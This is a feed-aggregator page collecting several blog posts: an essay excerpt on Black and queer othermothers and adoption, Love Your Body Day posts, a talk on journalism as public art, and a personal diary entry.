    Historically, before the increasing availability of assisted reproductive technology (ART) in the 1990s allowed women to become pregnant without engaging in heterosexual sex, queer othermothers have had great investment in remaining invisible. Their invisibility was critical to queer biological mothers maintaining custody of their children during the second half of the twentieth century, as husbands and biological fathers could use a mother’s sexuality as justification for taking her children away (“Milestones in LGBT Parenting History”).

    While ART has allowed legally single women to become pregnant and has greatly lessened fear of losing custody to a male partner, the vast majority of states still deny queer women the right to marry and co- adopt, leaving them without even basic parental rights over children they raise from birth.

    Rather than receiving the legitimacy afforded to heterosexual adoptive mothers by legal and social systems already in place, queer othermothers are often viewed as outsiders or helpers, more like aunts than mothers, and this difference is reinforced by the fact that, like African American othermothers, they usually carry “no legal maternal status” (Park 79).

    Even in the most progressive of states, queer othermothers are required to spend thousands of dollars to legally adopt the children they planned for and their partners delivered, essentially becoming adoptive mothers even if they are married or partnered with the child’s birth mother for years prior to conception. Again, queer othermothers’ stories simply aren’t told within the adoptive community.

    Of course, unlike Black othermothers, queer othermothers don’t step in only to fill a gap in a child’s life. They aren’t there to provide services that a biological mother cannot or will not, nor is their place in their child’s life dependent on fluctuating needs.

    But it would be naïve to ignore the fact that all children gain different things from each parent, and that each parent acts in ways that complement another in hopes that all a child’s needs are met when all parents are considered. Furthermore, Black and queer othermothers share key characteristics: they challenge monomaternalism and reinforce the fact that children can and do thrive under the care of multiple mothers. They are also similarly disadvantaged by a society that prioritizes biological motherhood.

    And, unlike in cases of traditional adoption, neither Black nor queer othermothers compromise the biological mother’s place in their child’s life. The fact that Black and queer othermothers have for so long existed outside of “legal maternity” and have grown accustomed to being considered “secondary” parents provides partial explanation for their absence in conversations surrounding adoptive motherhood.

    Of course, even white, heterosexually married, middle-class adoptive mothers face challenges in their efforts to become a part of the motherhood narrative. Adoptive Black Mom allows that, “there’s just some stuff on this adoption journey that I think privilege can’t buffer. Make that a lot of stuff” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 16).

    Our society’s dependence on biocentric visions of motherhood has long placed adoptive mothers on the periphery of maternity regardless of their race or sexuality. In her book Mothering Queerly, Queering Motherhood, Shelly M. Park explains that, “like light-skinned blacks or closeted queers, adoptive mothers know that we are ‘passing’” (24). Adoptive motherhood contradicts biocentrism, and adoption, Park concedes, “is [still] considered a ‘second-best’ solution to the problem of discovered infertility” (61). Still, this imperfect place on the “borderlands of maternity” (58) remains a visible one, largely unavailable to Black and/or queer women. These white, heterosexual adoptive mothers’ voices, while marginalized, are still heard.

    Writing is an act of resistance and activism, and it provides an outlet through which many white, heterosexual mothers might be able to share their stories. But for many Black women dealing with the profound inequalities of a racist society, “survival is a form of resistance” (Collins, 200). For Queer women, being called “mama” by their adopted child is activism. Books and blogs on Black and queer adoptive motherhood may never arrive in substantial numbers, both because of the silencing effects of racism and homophobia and also because the widespread history of othermotherhood has lessened its novelty, even to those involved in it.

    Lest it appear that the experiences of Black and queer women can be conflated, it’s important to distinguish between Black othermothers, who generally seek no legal rights, and queer othermothers, who often place great value on legal reinforcement of their parenthood in the rare cases where it’s available. Of course, Black, queer women face compounded struggles as mothers, othermothers, and adoptive mothers, and they have their own unique stories to tell. But both Black and queer othermothers aim to serve as additional, rather than replacement, mothers; both challenge the biocentric and monomaternal vision of motherhood, and also the racialized and heteronormative visions of adoptive motherhood.

    The history of othermothering in Black and queer communities does not justify the absence of Black and queer adoptive mothers within the larger adoption narrative. Rather, it serves to complicate the understanding of their absence.

    The media plays a profound role in raising awareness of the struggles of marginalized groups, and whether it be access to social services that allow children to remain with othermothers within their community or affordable access to legal adoption for queer othermothers, giving othermothers and non-normative adoptive mothers a voice will increase the safety and stability of adoptive families everywhere.

    Sara Erdmann earned her PhD in literature and creative writing in 2013. She teaches English at an all-girls boarding school in Connecticut, where she writes fiction and reads obsessively about issues affecting women worldwide. You can follow her on Twitter at @smerdmann.

    Works Cited

    Collins, Patricia Hill. Black Feminist Thought: Knowledge, Consciousness, and the Politics of Empowerment. City: Publisher, Year. Print.

    “Massachusetts Adoption of Children Act, 1851.” The Adoption History Project.

    University of Oregon, 2012. Web. 18 March 2014.


    “Milestones in LGBT Parenting History.”, 2014. Web. 18 March 2014.

    Paige, Kathy. Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All.

    Park, Shelley M. Mothering Queerly, Queering Motherhood. City: SUNY Press, 2014.


    James, Stanlie M. “Mothering: A possible Black feminist link to social transformation?”

    Theorizing Black Feminisms: The Visionary Pragmatism of Black Women. Ed. Stanlie M.

    James and Abena P. A. Busia. City: Routledge, 1993. Ppgs. Print.

    The post Who’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay] appeared first on Racialicious - the intersection of race and pop culture.

    Sociological Images10 Honest Thoughts on Being Loved by a Skinny Boy

    Today is Love Your Body Day and is this is our favorite body positive post of the year, re-posted in celebration. 

    Rachel Wiley delivers a provocative poem about her experience as a “fat girl” loved by a skinny boy.  My favorite part:

    My college theater professor once told me
    that despite my talent,
    I would never be cast as a romantic lead.
    We put on shows that involve flying children and singing animals
    but apparently no one
    has enough willing suspension of disbelief
    to buy anyone loving a fat girl.

    Watch the whole thing (transcript here):

    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase=",0,40,0" height="315" width="560"><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="src" value="//;hl=en_US"/><param name="allowfullscreen" value="true"/><embed allowfullscreen="true" allowscriptaccess="always" height="315" src="//;hl=en_US" type="application/x-shockwave-flash" width="560"></object>

    If you liked, we also recommend Kara Kamos’ confession that she’s ugly, but can’t think of a good reason to care.  Hat tip to Polly’s Pocket.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at

    Sociological ImagesLove Your Body Day: Hall of Fame and Shame

    It’s Love Your Body day!  Below is a Hall of Fame and a Hall of Shame.  The second set of posts reveal just what we’re up against, but the first set is a salve, a celebration of all of our beautifully diverse and interesting bodies.

    You choose what will amp you up today,  but don’t miss this year’s SocImages Pick: Rachel Wiley offers 10 Honest Thoughts About Being Loved by a Skinny Boy.

    The Hall of Fame

    Body Types

    The Hall of Shame

    Body Types


    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at

    Racialicious#GIA14: Journalism as Public + Art

    I’m on the road still – currently in Houston at the Grantmakers in the Arts 2014 Conference in Houston, Texas. This year’s conference will focus on grantmaking, race, and social justice, so I will be blogging from the conference for the next few days about issues pertinent to artists of color.

    I’m speaking at the Monday morning plenary, on how the future of journalism is looking more and more like public art. Here’s a cleaned up version of my talk. – LDP

    What is the future of journalism? The increasingly terrifying answer is that no one truly knows – in a time of budget cuts and a shifting media environment, it would be all too simple to despair. But in times of great turmoil we see some of the greatest forms of inspiration. In the media world, we are beginning to redefine what journalism is and what journalism can be. What is journalism, but a way of informing the public? What is art, but the expression of ideas made public? And what happens when the walls between the two start to fall?

    Early experiments show a need for journalism to leap off the page, phone, and tablet and into other types of spaces. The “Reveal” project from the New York Times R & D lab, placed news, weather, and biometric data like a users weight and heart rate into a tricked out mirror.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    The team started this project to “to explore how the relationship between information and the self is evolving.” So information moved from pages to personalized surfaces. But where else?

    In response to the ongoing debates around net neutrality, activists from Fight for the Future took the story to the streets. Erecting a billboard and speakers, they blared John Oliver’s 15 minute monologue around the FCC to the front doors of the building – alerting passerby to both the story and the need for action.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    But how else can we transport a story?

    The MIT Media Lab grew a small experiment into an interactive art display, where even the spokes of a bike passing you on the street can deliver a message and tell a story.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    Don’t be fooled by the grand look of many of these projects. The reason these types of innovation in journalism is possible is due to the change in consumer technology.

    My Knight Project at Stanford focused on creating interactive public spaces with the most powerful tools already we can fit into pockets. And with a few small additions, you can create a mobile interaction space with tools that fit in your back pack. With sensors like the Kinect, bluetooth speakers and mini projectors, a story can live anywhere.

    The mobile projection kit. Photo by Sam Stewart.

    The mobile projection kit. Photo by Sam Stewart.

    Like here – Luminous Intervention, an activist group in Baltimore had a major idea: to draw attention to the growing number of people without shelter. The simple solution? To project people under this road where drivers and passerby could see it.

    Luminous Internventions

    Luminous Internventions

    Raising awareness, and making a public statement was not limited to an op-ed or a flyer. The statement – and the story – became part of the visual environment.

    We can also foster community reactions to popular news stories. This image, also from Luminous Interventions, took the Occupy Movement and put it on the streets of Baltimore, in an accessible way to spark community dialogue and conversation. There was no need for people to go anywhere to engage – the conversation happened in their streets, on their block.

    Luminous Intervention

    Luminous Intervention

    And most recently, in St. Louis, Missouri, activists have used their cell phones and projections to take the news to city hall – literally. Kajieme Powell was shot and killed by police officers, within the same month as Michael Brown’s death in Ferguson, Missouri. Here , citizens ensured that this event was on the was not forgotten by looping the video.

    <script async="async" charset="utf-8" src=""></script>

    My friend and co-fellow Mariam Seeman urged journalists to adopt a new framework for reporting – to go from storytelling to storyliving:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    This action is how we live a story.

    To move story living even further, journalist and artist Nonny De La Pena creates what she calls immersive journalism experiences. She hacked together virtual reality kit using an open source video game platform called Unity. From that base,she’s been able to explore a multitude of news stories – and picked up an Indiecade impact award this weekend for changing the expanding the scope of games. She’s explored issues like Hunger in Los Angeles and the experiences of prisoners in Guantanamo bay. One of her latest projects focuses on Syria – let’s experience a little of what de la Pena creates:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    And with the advent of personal virtual reality technology, like Oculus Rift, these types of complex experiences will be soon be seen in the comfort of your own home.

    One of the final elements of storyliving is social exchange. While most understand the need for social media as a way of promoting work, there is still so much potential in creating multifaceted stories with varying narratives in real time. The Question Bridge project, from Hank Willis Thomas and Chris Johnson does just that – by using devices like iPads and phones to allow viewers to see the project, ask a question, and record their own responses, becoming part of the conversation in a way that’s deeper than an interview filtered through a third party.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    These were just a few of the many ideas influencing journalism right now. But it’s easy to see that the most interesting aspects of journalism’s evolution looks a lot like art – putting ideas, people, and the public first. Thank you.

    The post #GIA14: Journalism as Public + Art appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaAndrew Pollock: [life] Day 258: Kindergarten, demonstrations and play dates

    I had my second Thermomix demonstration this morning. It was a decent drive from home away, and in my thoroughness to be properly prepared, I somehow managed to misjudge the time and arrived an hour earlier than I needed to. Oops.

    It was good to have the additional time up my sleeves though, and I was happy with how the demonstration went, and it left me with a comfortable amount of time to get to Kindergarten to pick Zoe up. It did completely wipe out the day though.

    Zoe wanted to watch Megan's tennis class, so I left her with Jason while I popped home to get changed, and then came back in time for the conclusion of tennis class.

    Zoe wanted Megan to come over for a play date, so I took Megan back to our place, and the girls had a great afternoon on the balcony doing some self-directed craft. I used the time to play catch up and make a bunch of phone calls.

    It wasn't until after Sarah picked up Zoe that I realised I'd barely interacted with her all afternoon though, which was a bit of a shame. I'll be happy once this sausage sizzle on Saturday is done, and the pace of life should slow down a bit more again.

    It was a bit of a struggle to force myself to go to yoga class tonight, but I'm glad I did, because it was a really great class.